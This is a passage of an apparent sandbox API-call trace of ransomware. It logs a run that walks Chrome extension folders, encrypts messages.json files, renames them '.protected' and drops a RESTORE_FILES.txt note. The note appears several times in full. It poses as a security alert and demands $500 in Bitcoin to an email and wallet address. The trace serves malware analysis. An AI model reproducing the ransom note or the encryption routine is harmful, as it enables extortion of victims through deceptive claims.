unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.467] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.468] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.468] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.468] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.468] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.468] CloseHandle (hObject=0x164) returned 1 [0081.468] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.468] lstrcmpiW (lpString1="ko", lpString2="Windows") returned -1 [0081.468] lstrcmpiW (lpString1="ko", lpString2="Program Files") returned -1 [0081.468] lstrcmpiW (lpString1="ko", lpString2="Program Files (x86)") returned -1 [0081.468] lstrcmpiW (lpString1="ko", lpString2="$Recycle.bin") returned 1 [0081.468] lstrcmpiW (lpString1="ko", lpString2="System Volume Information") returned -1 [0081.468] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko") returned 141 [0081.468] lstrcmpW (lpString1="ko", lpString2=".") returned 1 [0081.468] lstrcmpW (lpString1="ko", lpString2="..") returned 1 [0081.468] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\*") returned 143 [0081.468] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.469] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.469] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.469] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.469] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.469] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.469] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\.") returned 143 [0081.469] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.469] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.469] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.469] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.469] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.469] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.469] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.469] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\..") returned 144 [0081.469] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.469] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.469] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.469] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.469] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.469] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.469] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.469] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.469] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json") returned 155 [0081.469] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.469] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.469] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.469] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.469] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.470] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json") returned 155 [0081.470] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.470] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json") returned 155 [0081.470] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.470] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json") returned 155 [0081.470] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.470] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x100, lpOverlapped=0x0) returned 1 [0081.471] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.471] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x100, lpOverlapped=0x0) returned 1 [0081.471] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.471] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.471] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.471] CloseHandle (hObject=0x168) returned 1 [0081.471] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.protected") returned 165 [0081.471] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.protected")) returned 1 [0081.473] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.473] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.473] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\RESTORE_FILES.txt") returned 159 [0081.473] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.473] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.473] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.474] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.474] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.474] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.474] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.474] CloseHandle (hObject=0x164) returned 1 [0081.474] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.474] lstrcmpiW (lpString1="lt", lpString2="Windows") returned -1 [0081.474] lstrcmpiW (lpString1="lt", lpString2="Program Files") returned -1 [0081.474] lstrcmpiW (lpString1="lt", lpString2="Program Files (x86)") returned -1 [0081.474] lstrcmpiW (lpString1="lt", lpString2="$Recycle.bin") returned 1 [0081.474] lstrcmpiW (lpString1="lt", lpString2="System Volume Information") returned -1 [0081.474] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt") returned 141 [0081.474] lstrcmpW (lpString1="lt", lpString2=".") returned 1 [0081.474] lstrcmpW (lpString1="lt", lpString2="..") returned 1 [0081.474] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\*") returned 143 [0081.474] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.474] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.474] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.474] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.474] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.475] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.475] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\.") returned 143 [0081.475] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.475] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.475] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.475] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.475] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.475] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.475] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.475] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\..") returned 144 [0081.475] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.475] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.475] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.475] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.475] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.475] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.475] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.475] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.475] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json") returned 155 [0081.475] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.475] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.475] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.475] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.475] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.476] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json") returned 155 [0081.476] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.476] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json") returned 155 [0081.476] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.476] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json") returned 155 [0081.476] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.476] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xfd, lpOverlapped=0x0) returned 1 [0081.477] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff03, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.477] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xfd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xfd, lpOverlapped=0x0) returned 1 [0081.477] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.477] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.477] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.477] CloseHandle (hObject=0x168) returned 1 [0081.477] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.protected") returned 165 [0081.477] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.protected")) returned 1 [0081.478] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.478] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.478] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\RESTORE_FILES.txt") returned 159 [0081.478] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.478] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.478] 